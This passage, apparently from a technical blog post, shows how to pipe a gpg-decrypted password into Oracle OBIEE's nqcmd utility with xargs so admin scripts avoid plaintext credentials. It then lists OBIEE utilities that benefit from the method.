To invoke the utility and pass across the decrypted password, there’s no need for named pipes. Instead we can just use a normal (“unnamed”) pipe to send the output straight from gpg to the target utility (nqcmd in this example), via xargs:
gpg --batch --quiet --recipient obiee --decrypt ~/password.gpg | xargs -I GPGOUT nqcmd -d AnalyticsWeb -u weblogic -p GPGOUT -s input.lsql
xargs has a --interactive option that makes it a lot easier when developing piped commands such as the above.
Because there is no passphrase on the gpg key, a user who obtained access to the server would still be able to decrypt the credentials file. In many ways this is the same situation that would arise if a server was configured to use ssh-key authentication to carry out tasks or transfer files on another server.

Uses
Here are some of the utilities that the above now enables us to run more securely:
- nqcmd is a mainstay of my OBIEE toolkit, being useful for performance testing, regression testing, aggregate building, and more. Using the method above, it’s now easy to avoid storing a plaintext password in a script that calls it.
- Keeping the Presentation Catalog in sync on an OBIEE warm standby server, using Presentation Services Replication
- Purging the Presentation Services Cache from the command line (with Catalog Manager, per the above example)
- SampleApp comes with four excellent utilities that Oracle has provided; however, all but one require plaintext credentials by default. If you’ve not looked at the utilities closely yet, you should! You can see them in action in SampleApp itself, or get an idea of what they do by looking at the SampleApp User Guide pages 14–17 or watching the YouTube video.